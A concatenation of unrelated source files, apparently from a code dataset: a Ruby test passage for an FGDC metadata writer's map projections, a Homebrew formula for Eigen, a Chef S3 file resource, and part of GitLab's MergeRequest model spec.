assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
end
# map projections - sinusoidal
def test_mapProjection_sinusoidal
expect = @@axExpect[19].to_s.squeeze(' ')
hProjection = TDClass.build_projection('sinusoidal', 'Sinusoidal')
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
end
# map projections - space oblique mercator
def test_mapProjection_spaceMercator
expect = @@axExpect[20].to_s.squeeze(' ')
hProjection = TDClass.build_projection('spaceOblique', 'Space Oblique Mercator')
TDClass.add_landsat(hProjection)
TDClass.add_landsatPath(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:landsatNumber] = nil
hProjection[:landsatPath] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat number is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat path is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:landsatNumber)
hProjection.delete(:landsatPath)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat number is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat path is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
end
# map projections - stereographic
def test_mapProjection_stereographic
expect = @@axExpect[21].to_s.squeeze(' ')
hProjection = TDClass.build_projection('stereographic', 'Stereographic')
TDClass.add_latPC(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:latitudeOfProjectionCenter)
hProjection.delete(:longitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
end
# map projections - transverse mercator
def test_mapProjection_transverseMercator
expect = @@axExpect[22].to_s.squeeze(' ')
hProjection = TDClass.build_projection('transverseMercator', 'Transverse Mercator')
TDClass.add_scaleFactorCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:scaleFactorAtCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
end
# map projections - van der grinten
def test_mapProjection_vanDerGrinten
expect = @@axExpect[23].to_s.squeeze(' ')
hProjection = TDClass.build_projection('grinten', 'Van der Grinten')
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
end
# map projections - projection parameters
def test_mapProjection_projectionParameters
expect = @@axExpect[24].to_s.squeeze(' ')
hProjection = TDClass.build_projection('parameters', 'Map Projection Parameters')
TDClass.add_falseNE(hProjection)
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_heightPP(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_scaleFactorE(hProjection)
TDClass.add_scaleFactorCL(hProjection)
TDClass.add_scaleFactorPO(hProjection)
TDClass.add_scaleFactorCM(hProjection)
TDClass.add_obliqueLineAzimuth(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_straightFromPole(hProjection)
TDClass.add_landsat(hProjection)
TDClass.add_landsatPath(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
end
  # map projections - other projection description
def test_mapProjection_other
expect = @@axExpect[25].to_s.squeeze(' ')
hProjection = TDClass.build_projection('other', 'Other Projection Description', 'other projection description description')
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:projectionIdentifier][:description] = ''
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 1, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection other projection description is missing: CONTEXT is spatial reference horizontal planar map projection other'
# test missing elements
hProjection[:projectionIdentifier].delete(:description)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 1, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection other projection description is missing: CONTEXT is spatial reference horizontal planar map projection other'
end
end
| 53.67959 | 221 | 0.766966 |
ac00fe4c9e3c0b8e34d1954336e672dfa5c998a1 | 1,443 | class Eigen < Formula
desc "C++ template library for linear algebra"
homepage "http://eigen.tuxfamily.org/"
url "https://bitbucket.org/eigen/eigen/get/3.2.5.tar.bz2"
sha256 "5f6e6cb88188e34185f43cb819d7dab9b48ef493774ff834e568f4805d3dc2f9"
bottle do
cellar :any
sha256 "6f3d26b12625d87f96a92c0c14745c444889377d7990aed6d43ae373e5647f42" => :yosemite
sha256 "38a61f7b2d6926411b14bf93b685d35ba8648993f1f35e3fe98c024de811e310" => :mavericks
sha256 "96ae43217989839b2adbc41dd43a4a02dd6346b4847b93935c5dc481091a7585" => :mountain_lion
end
head "https://bitbucket.org/eigen/eigen", :using => :hg
depends_on "cmake" => :build
option :universal
def install
ENV.universal_binary if build.universal?
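    # out-of-source CMake build; pkg_config_libdir points the generated
    # eigen3.pc at this keg's lib directory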
mkdir "eigen-build" do
args = std_cmake_args
args << "-Dpkg_config_libdir=#{lib}" << ".."
system "cmake", *args
system "make", "install"
end
(share/"cmake/Modules").install "cmake/FindEigen3.cmake"
end
test do
(testpath/"test.cpp").write <<-EOS.undent
#include <iostream>
#include <Eigen/Dense>
using Eigen::MatrixXd;
int main()
{
MatrixXd m(2,2);
m(0,0) = 3;
m(1,0) = 2.5;
m(0,1) = -1;
m(1,1) = m(1,0) + m(0,1);
std::cout << m << std::endl;
}
EOS
system ENV.cxx, "test.cpp", "-I#{include}/eigen3", "-o", "test"
assert_equal `./test`.split, %w[3 -1 2.5 1.5]
end
end
| 28.86 | 95 | 0.643798 |
ac7dc14e833cf8989579a9d096909608640e1f57 | 820 | actions :create, :create_if_missing
attribute :source, :kind_of => String, :name_attribute => true
attribute :path, :kind_of => String
attribute :access_key_id, :kind_of => String
attribute :secret_access_key, :kind_of => String
attribute :checksum, :kind_of => String, :default => nil
attribute :owner, :regex => Chef::Config[:user_valid_regex]
attribute :group, :regex => Chef::Config[:group_valid_regex]
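# validate :mode as an octal permission value: string modes get a leading zero
# prepended (if missing) so Integer() parses them as octal, and the result must
# fall within 0..07777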
attribute :mode, :callbacks => {
"not in valid numeric range" => lambda { |m|
    if m.kind_of?(String)
      m = "0#{m}" unless m =~ /^0/
    end
    Integer(m) <= 07777 && Integer(m) >= 0
}
}
| 45.555556 | 78 | 0.492683 |
11234982dd49dba20a3d26537c13ee99429098be | 105,985 | # frozen_string_literal: true
require 'spec_helper'
describe MergeRequest do
include RepoHelpers
include ProjectForksHelper
include ReactiveCachingHelpers
using RSpec::Parameterized::TableSyntax
subject { create(:merge_request) }
describe 'associations' do
it { is_expected.to belong_to(:target_project).class_name('Project') }
it { is_expected.to belong_to(:source_project).class_name('Project') }
it { is_expected.to belong_to(:merge_user).class_name("User") }
it { is_expected.to have_many(:assignees).through(:merge_request_assignees) }
it { is_expected.to have_many(:merge_request_diffs) }
context 'for forks' do
let!(:project) { create(:project) }
let!(:fork) { fork_project(project) }
let!(:merge_request) { create(:merge_request, target_project: project, source_project: fork) }
it 'does not load another project due to inverse relationship' do
expect(project.merge_requests.first.target_project.object_id).to eq(project.object_id)
end
it 'finds the associated merge request' do
expect(project.merge_requests.find(merge_request.id)).to eq(merge_request)
end
end
end
describe 'locking' do
using RSpec::Parameterized::TableSyntax
where(:lock_version) do
[
[0],
["0"]
]
end
with_them do
it 'works when a merge request has a NULL lock_version' do
merge_request = create(:merge_request)
described_class.where(id: merge_request.id).update_all('lock_version = NULL')
merge_request.update!(lock_version: lock_version, title: 'locking test')
expect(merge_request.reload.title).to eq('locking test')
end
end
end
describe '#squash_in_progress?' do
let(:repo_path) do
Gitlab::GitalyClient::StorageSettings.allow_disk_access do
subject.source_project.repository.path
end
end
let(:squash_path) { File.join(repo_path, "gitlab-worktree", "squash-#{subject.id}") }
before do
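      # simulate an in-progress squash by creating the detached worktree a
      # running squash would leave behind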
system(*%W(#{Gitlab.config.git.bin_path} -C #{repo_path} worktree add --detach #{squash_path} master))
end
it 'returns true when there is a current squash directory' do
expect(subject.squash_in_progress?).to be_truthy
end
it 'returns false when there is no squash directory' do
FileUtils.rm_rf(squash_path)
expect(subject.squash_in_progress?).to be_falsey
end
it 'returns false when the squash directory has expired' do
time = 20.minutes.ago.to_time
File.utime(time, time, squash_path)
expect(subject.squash_in_progress?).to be_falsey
end
it 'returns false when the source project has been removed' do
allow(subject).to receive(:source_project).and_return(nil)
expect(subject.squash_in_progress?).to be_falsey
end
end
describe '#squash?' do
let(:merge_request) { build(:merge_request, squash: squash) }
subject { merge_request.squash? }
context 'disabled in database' do
let(:squash) { false }
it { is_expected.to be_falsy }
end
context 'enabled in database' do
let(:squash) { true }
it { is_expected.to be_truthy }
end
end
describe '#default_squash_commit_message' do
let(:project) { subject.project }
let(:is_multiline) { -> (c) { c.description.present? } }
let(:multiline_commits) { subject.commits.select(&is_multiline) }
let(:singleline_commits) { subject.commits.reject(&is_multiline) }
it 'returns the oldest multiline commit message' do
expect(subject.default_squash_commit_message).to eq(multiline_commits.last.message)
end
it 'returns the merge request title if there are no multiline commits' do
expect(subject).to receive(:commits).and_return(
CommitCollection.new(project, singleline_commits)
)
expect(subject.default_squash_commit_message).to eq(subject.title)
end
it 'does not return commit messages from multiline merge commits' do
collection = CommitCollection.new(project, multiline_commits).enrich!
expect(collection.commits).to all( receive(:merge_commit?).and_return(true) )
expect(subject).to receive(:commits).and_return(collection)
expect(subject.default_squash_commit_message).to eq(subject.title)
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Issuable) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
it { is_expected.to include_module(Taskable) }
it_behaves_like 'AtomicInternalId' do
let(:internal_id_attribute) { :iid }
let(:instance) { build(:merge_request) }
let(:scope) { :target_project }
let(:scope_attrs) { { project: instance.target_project } }
let(:usage) { :merge_requests }
end
end
describe 'validation' do
it { is_expected.to validate_presence_of(:target_branch) }
it { is_expected.to validate_presence_of(:source_branch) }
context "Validation of merge user with Merge When Pipeline Succeeds" do
it "allows user to be nil when the feature is disabled" do
expect(subject).to be_valid
end
it "is invalid without merge user" do
subject.merge_when_pipeline_succeeds = true
expect(subject).not_to be_valid
end
it "is valid with merge user" do
subject.merge_when_pipeline_succeeds = true
subject.merge_user = build(:user)
expect(subject).to be_valid
end
end
context 'for branch' do
before do
stub_feature_flags(stricter_mr_branch_name: false)
end
using RSpec::Parameterized::TableSyntax
where(:branch_name, :valid) do
'foo' | true
'foo:bar' | false
'+foo:bar' | false
'foo bar' | false
'-foo' | false
'HEAD' | true
'refs/heads/master' | true
end
with_them do
it "validates source_branch" do
subject = build(:merge_request, source_branch: branch_name, target_branch: 'master')
subject.valid?
expect(subject.errors.added?(:source_branch)).to eq(!valid)
end
it "validates target_branch" do
subject = build(:merge_request, source_branch: 'master', target_branch: branch_name)
subject.valid?
expect(subject.errors.added?(:target_branch)).to eq(!valid)
end
end
end
context 'for forks' do
let(:project) { create(:project) }
let(:fork1) { fork_project(project) }
let(:fork2) { fork_project(project) }
it 'allows merge requests for sibling-forks' do
subject.source_project = fork1
subject.target_project = fork2
expect(subject).to be_valid
end
end
end
describe 'callbacks' do
describe '#ensure_merge_request_metrics' do
it 'creates metrics after saving' do
merge_request = create(:merge_request)
expect(merge_request.metrics).to be_persisted
expect(MergeRequest::Metrics.count).to eq(1)
end
it 'does not duplicate metrics for a merge request' do
merge_request = create(:merge_request)
merge_request.mark_as_merged!
expect(MergeRequest::Metrics.count).to eq(1)
end
end
end
describe 'respond to' do
it { is_expected.to respond_to(:unchecked?) }
it { is_expected.to respond_to(:can_be_merged?) }
it { is_expected.to respond_to(:cannot_be_merged?) }
it { is_expected.to respond_to(:merge_params) }
it { is_expected.to respond_to(:merge_when_pipeline_succeeds) }
end
describe '.by_commit_sha' do
subject(:by_commit_sha) { described_class.by_commit_sha(sha) }
let!(:merge_request) { create(:merge_request, :with_diffs) }
context 'with sha contained in latest merge request diff' do
let(:sha) { 'b83d6e391c22777fca1ed3012fce84f633d7fed0' }
it 'returns merge requests' do
expect(by_commit_sha).to eq([merge_request])
end
end
    context 'with sha not contained in latest merge request diff' do
let(:sha) { 'b83d6e391c22777fca1ed3012fce84f633d7fed0' }
it 'returns empty requests' do
latest_merge_request_diff = merge_request.merge_request_diffs.create
latest_merge_request_diff.merge_request_diff_commits.where(sha: 'b83d6e391c22777fca1ed3012fce84f633d7fed0').delete_all
expect(by_commit_sha).to be_empty
end
end
context 'with sha not contained in' do
let(:sha) { 'b83d6e3' }
it 'returns empty result' do
expect(by_commit_sha).to be_empty
end
end
end
describe '.in_projects' do
it 'returns the merge requests for a set of projects' do
expect(described_class.in_projects(Project.all)).to eq([subject])
end
end
describe '.set_latest_merge_request_diff_ids!' do
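    # helper: build an MR against `project` and attach `diffs` extra merge
    # request diffs so latest_merge_request_diff_id has rows to point at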
def create_merge_request_with_diffs(source_branch, diffs: 2)
params = {
target_project: project,
target_branch: 'master',
source_project: project,
source_branch: source_branch
}
create(:merge_request, params).tap do |mr|
diffs.times { mr.merge_request_diffs.create }
end
end
let(:project) { create(:project) }
it 'sets IDs for merge requests, whether they are already set or not' do
merge_requests = [
create_merge_request_with_diffs('feature'),
create_merge_request_with_diffs('feature-conflict'),
create_merge_request_with_diffs('wip', diffs: 0),
create_merge_request_with_diffs('csv')
]
merge_requests.take(2).each do |merge_request|
merge_request.update_column(:latest_merge_request_diff_id, nil)
end
expected = merge_requests.map do |merge_request|
merge_request.merge_request_diffs.maximum(:id)
end
expect { project.merge_requests.set_latest_merge_request_diff_ids! }
.to change { merge_requests.map { |mr| mr.reload.latest_merge_request_diff_id } }.to(expected)
end
end
describe '.recent_target_branches' do
let(:project) { create(:project) }
let!(:merge_request1) { create(:merge_request, :opened, source_project: project, target_branch: 'feature') }
let!(:merge_request2) { create(:merge_request, :closed, source_project: project, target_branch: 'merge-test') }
let!(:merge_request3) { create(:merge_request, :opened, source_project: project, target_branch: 'fix') }
let!(:merge_request4) { create(:merge_request, :closed, source_project: project, target_branch: 'feature') }
before do
merge_request1.update_columns(updated_at: 1.day.since)
merge_request2.update_columns(updated_at: 2.days.since)
merge_request3.update_columns(updated_at: 3.days.since)
merge_request4.update_columns(updated_at: 4.days.since)
end
it 'returns target branches sort by updated at desc' do
expect(described_class.recent_target_branches).to match_array(['feature', 'merge-test', 'fix'])
end
end
describe '#target_branch_sha' do
let(:project) { create(:project, :repository) }
subject { create(:merge_request, source_project: project, target_project: project) }
context 'when the target branch does not exist' do
before do
project.repository.rm_branch(subject.author, subject.target_branch)
subject.clear_memoized_shas
end
it 'returns nil' do
expect(subject.target_branch_sha).to be_nil
end
end
it 'returns memoized value' do
subject.target_branch_sha = '8ffb3c15a5475e59ae909384297fede4badcb4c7'
expect(subject.target_branch_sha).to eq '8ffb3c15a5475e59ae909384297fede4badcb4c7'
end
end
describe '#card_attributes' do
it 'includes the author name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => "" })
end
it 'includes the assignees name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([double(name: 'Douwe'), double(name: 'Robert')])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => 'Douwe and Robert' })
end
end
describe '#assignee_or_author?' do
let(:user) { create(:user) }
it 'returns true for a user that is assigned to a merge request' do
subject.assignees = [user]
expect(subject.assignee_or_author?(user)).to eq(true)
end
it 'returns true for a user that is the author of a merge request' do
subject.author = user
expect(subject.assignee_or_author?(user)).to eq(true)
end
it 'returns false for a user that is not the assignee or author' do
expect(subject.assignee_or_author?(user)).to eq(false)
end
end
describe '#visible_closing_issues_for' do
let(:guest) { create(:user) }
let(:developer) { create(:user) }
let(:issue_1) { create(:issue, project: subject.source_project) }
let(:issue_2) { create(:issue, project: subject.source_project) }
let(:confidential_issue) { create(:issue, :confidential, project: subject.source_project) }
before do
subject.project.add_developer(subject.author)
subject.target_branch = subject.project.default_branch
commit = double('commit1', safe_message: "Fixes #{issue_1.to_reference} #{issue_2.to_reference} #{confidential_issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
end
it 'shows only allowed issues to guest' do
subject.project.add_guest(guest)
subject.cache_merge_request_closes_issues!
expect(subject.visible_closing_issues_for(guest)).to match_array([issue_1, issue_2])
end
it 'shows only allowed issues to developer' do
subject.project.add_developer(developer)
subject.cache_merge_request_closes_issues!
expect(subject.visible_closing_issues_for(developer)).to match_array([issue_1, confidential_issue, issue_2])
end
context 'when external issue tracker is enabled' do
before do
subject.project.has_external_issue_tracker = true
subject.project.save!
end
      it 'calls #closes_issues (not the cached version) to retrieve data' do
expect(subject).to receive(:closes_issues)
expect(subject).not_to receive(:cached_closes_issues)
subject.visible_closing_issues_for
end
end
end
describe '#cache_merge_request_closes_issues!' do
before do
subject.project.add_developer(subject.author)
subject.target_branch = subject.project.default_branch
end
it 'caches closed issues' do
issue = create :issue, project: subject.project
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }.to change(subject.merge_requests_closing_issues, :count).by(1)
end
it 'does not cache closed issues when merge request is closed' do
issue = create :issue, project: subject.project
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
allow(subject).to receive(:state).and_return("closed")
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
it 'does not cache closed issues when merge request is merged' do
issue = create :issue, project: subject.project
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
allow(subject).to receive(:state).and_return("merged")
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
context 'when both internal and external issue trackers are enabled' do
before do
subject.project.has_external_issue_tracker = true
subject.project.save!
create(:jira_service, project: subject.project)
end
it 'does not cache issues from external trackers' do
issue = ExternalIssue.new('JIRA-123', subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to raise_error
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
it 'caches an internal issue' do
issue = create(:issue, project: subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }
.to change(subject.merge_requests_closing_issues, :count).by(1)
end
end
context 'when only external issue tracker enabled' do
before do
subject.project.has_external_issue_tracker = true
subject.project.issues_enabled = false
subject.project.save!
end
it 'does not cache issues from external trackers' do
issue = ExternalIssue.new('JIRA-123', subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
it 'does not cache an internal issue' do
issue = create(:issue, project: subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }
.not_to change(subject.merge_requests_closing_issues, :count)
end
end
end
describe '#source_branch_sha' do
let(:last_branch_commit) { subject.source_project.repository.commit(Gitlab::Git::BRANCH_REF_PREFIX + subject.source_branch) }
context 'with diffs' do
subject { create(:merge_request, :with_diffs) }
it 'returns the sha of the source branch last commit' do
expect(subject.source_branch_sha).to eq(last_branch_commit.sha)
end
end
context 'without diffs' do
subject { create(:merge_request, :without_diffs) }
it 'returns the sha of the source branch last commit' do
expect(subject.source_branch_sha).to eq(last_branch_commit.sha)
end
context 'when there is a tag name matching the branch name' do
let(:tag_name) { subject.source_branch }
it 'returns the sha of the source branch last commit' do
subject.source_project.repository.add_tag(subject.author,
tag_name,
subject.target_branch_sha,
'Add a tag')
expect(subject.source_branch_sha).to eq(last_branch_commit.sha)
subject.source_project.repository.rm_tag(subject.author, tag_name)
end
end
end
context 'when the merge request is being created' do
subject { build(:merge_request, source_branch: nil, compare_commits: []) }
it 'returns nil' do
expect(subject.source_branch_sha).to be_nil
end
end
